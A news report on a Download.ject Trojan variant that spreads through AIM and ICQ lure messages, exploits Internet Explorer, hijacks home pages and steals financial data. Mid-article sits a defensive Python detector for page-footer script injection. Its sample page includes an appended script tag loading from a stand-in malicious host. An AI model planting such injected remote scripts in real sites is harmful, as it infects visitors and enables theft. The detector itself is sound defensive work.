New AIM Trojan steals financial data

A new variant of Download.ject is threatening AIM users, opening backdoors and stealing financial data.


A new variant of Download.ject is in the wild, using instant messaging to spread. Like the first strain, this Trojan horse is designed to open backdoors and steal financial data, according to PivX Solutions. The Newport Beach, Calif.-based security firm was still analyzing the scope of the threat Thursday afternoon.

"This one has most of the characteristics of the first Download.ject," said Thor Larholm, senior security researcher with PivX. "The difference is that this one uses instant messaging to spread. If you receive the message and click the link, you're infected. Like the first attack, this one also appears to be financially motivated."

Larholm said it arrives as a harmless-looking instant message on AIM or ICQ that reads, "My personal home page http://XXXXXXX.X-XXXXXX.XXX/." Once the user clicks the link, Internet Explorer opens a malicious Web site that infects the machine through several Internet Explorer vulnerabilities. The first thing users with infected machines will notice is a modified home page and search pane in the browser. In place of the user's preferred home page is a site called TargetSearch, along with several browser windows displaying adult advertisements and referral links. PivX has notified antivirus vendors so they can create signatures for the threat, Larholm said.

The first Download.ject attack in June compromised machines using Windows Internet Explorer and Internet Information Services 5.0 (IIS). Microsoft concluded the assault was a targeted, manual attack by individuals or entities against a specific server. The Trojan used compromised sites to append JavaScript to the bottom of Web pages. When executed, the JavaScript accesses a file hosted on another server believed to contain malicious code that could affect the end user's system.
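The footer injection described above, where a script appended to the end of a served page pulls code from another server, can be checked for on a site's own pages. The following script is an added example, not code from the article or from PivX; the sample page, hostnames and trusted-host list are constructed for illustration.

```python
"""Flag web pages carrying an appended <script> that loads code from
another host, the injection pattern the article attributes to
Download.ject. Sample page and hostnames below are constructed."""
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
END_RE = re.compile(r"</(?:body|html)\s*>", re.I)


def find_injected_scripts(html, trusted_hosts):
    """Return (reason, snippet) pairs for scripts that look appended.

    Two signals are used, each enough on its own to flag a script:
    * it sits after the page's closing </body> or </html> tag, i.e. it
      was tacked onto the end of an already complete document;
    * it loads from a host not in trusted_hosts, matching the 'fetch a
      file hosted on another server' behaviour described in the article.
    """
    ends = list(END_RE.finditer(html))
    doc_end = ends[0].start() if ends else len(html)
    findings = []
    for m in SCRIPT_RE.finditer(html):
        attrs, snippet = m.group(1), m.group(0)[:60]
        if m.start() > doc_end:
            findings.append(("script after document end", snippet))
            continue
        src = SRC_RE.search(attrs)
        if src:
            host = (urlparse(src.group(1)).hostname or "").lower()
            if host and host not in trusted_hosts:
                findings.append(("external script from " + host, snippet))
    return findings


# Constructed sample: a normal page with a remote script appended past
# </html>, the way the article describes compromised pages being modified.
SAMPLE_PAGE = (
    "<html><head><script src='/js/site.js'></script></head>"
    "<body><p>Welcome</p></body></html>\n"
    "<script src='http://malicious.example/js.php'></script>"
)

if __name__ == "__main__":
    for reason, snippet in find_injected_scripts(SAMPLE_PAGE, {"www.example.org"}):
        print(reason, "|", snippet)
```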

The HangUP Team, a for-profit malicious code group from Russia, is believed responsible for the first Download.ject and for the recent rash of Korgo worms that attacked the LSASS vulnerability Microsoft outlined in Security Bulletin MS04-011. Experts believe the goal of the attack was to deliver malicious code to visitors of an affected Web site that could be used to steal credit card and other information that would then be sold to organized identity theft groups.

It's unclear if the HangUP Team is behind the latest variant.
